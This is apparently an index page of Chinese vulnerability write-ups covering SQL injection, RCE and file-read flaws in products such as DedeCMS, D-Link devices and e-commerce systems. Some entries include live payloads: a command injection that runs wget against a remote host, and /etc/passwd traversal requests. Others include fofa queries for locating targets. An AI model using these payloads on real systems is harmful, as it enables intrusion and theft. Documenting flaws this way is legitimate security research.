E2-1ECTouch-电商微信小程序-SQL 漏洞描述: ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进
E1-1EasyCVR-视频管理平台-InformationLeakage 漏洞描述: EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。 网站图片:
D21-1D-LINK-DI-8100-RCE 漏洞复现: payload: /msp_info.html?flag=cmd&cmd=%31%31%60%77%67%65%74%20%68%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%32%3a%39%3
D20-4DedeCMS–任意文件读取 漏洞描述: 需前台注册用户权限。 漏洞复现: payload: http://ip/dede/sys_verifies.php?action=view&filename=././/etc/passwd
D20-3DedeCMS–任意文件读取 漏洞复现: payload: /dede/sys_verifies.php?action=view&filename=././/etc/passwd
D20-2DedeCMS-RCE 漏洞描述: DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是,虽然article_template_rand.php对编辑的文件进行了一定的限制,但攻击者仍然可以绕过这些限制并以某种方式编写代码,从而允许经过身份验证的攻击者利用该漏洞执行任意
D19-1DT-高清车牌识别摄像机-任意文件读取 漏洞描述: DT-高清车牌识别摄像机 存在目录遍历致任意文件读取漏洞,未经身份验证的远程攻击者可以读取系统内部敏感配置文件,获取服务器信息,导致系统处于极不安全的状态。 网站图片: fofa语法: app=“DT-高清车牌识别摄像机” 漏洞复现: p
D20-1DedeCMS-RCE 漏洞描述: DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是,虽然sys_verizes.php对编辑的文件进行了一定的限制,但攻击者仍然可以绕过这些限制并以某种方式编写代码,从而允许经过身份验证的攻击者利用该漏洞执行任意命令并获得系统权限。
D18-1多客圈子-论坛系统-任意文件读取 漏洞描述: 多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 网站图片
D17-2大商创-多用户商城系统-SQL 漏洞描述: 大商创多用户商城系统 ajax_dialog.php、wholesale_flow.php等接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括
D17-1大商创-多用户商城系统-SQL 漏洞描述: 大商创多用户商城系统 ajax_dialog.php、wholesale_flow.php等接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括
D16-2D-Link-NAS-RCE 漏洞描述: D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”
D15-3Dst-admin-饥荒管理后台-RCE 漏洞描述: dst-admin饥荒管理后台kickPlayer、cavesConsole、sendBroadcast等接口处配置不当,导致破解口令后的攻击者可以进行命令注入,获取服务器权限。 影响版本: dst-admin 1.5.0版本 网站图片
D16-1D-Link-NAS-RCE 漏洞描述: D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”
D15-2Dst-admin-饥荒管理后台-RCE 漏洞描述: dst-admin饥荒管理后台kickPlayer、cavesConsole、sendBroadcast等接口处配置不当,导致破解口令后的攻击者可以进行命令注入,获取服务器权限 影响版本: dst-admin 1.5.0版本 网站图片:
D15-1Dst-admin-饥荒管理后台-RCE 漏洞描述: dst-admin饥荒管理后台kickPlayer、cavesConsole、sendBroadcast等接口处配置不当,导致破解口令后的攻击者可以进行命令注入,获取服务器权限。 影响版本: dst-admin 1.5.0版本 网站图片
D14-3东胜-物流软件-SQL 漏洞描述: 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除
D14-2东胜-物流软件-SQL 漏洞描述: 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除
D14-1东胜-物流软件-SQL 漏洞描述: 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除
D13-1DSShop-移动商城网店系统-反序列化RCE 漏洞描述: DSShop单店铺移动商城网店系统的getCartList方法的cart参数存在php反序列化漏洞,攻击者可以通过漏洞执行任意代码,获取服务器权限。 影响版本: DSShop <=V2 网站图片: 网络测绘: fofa
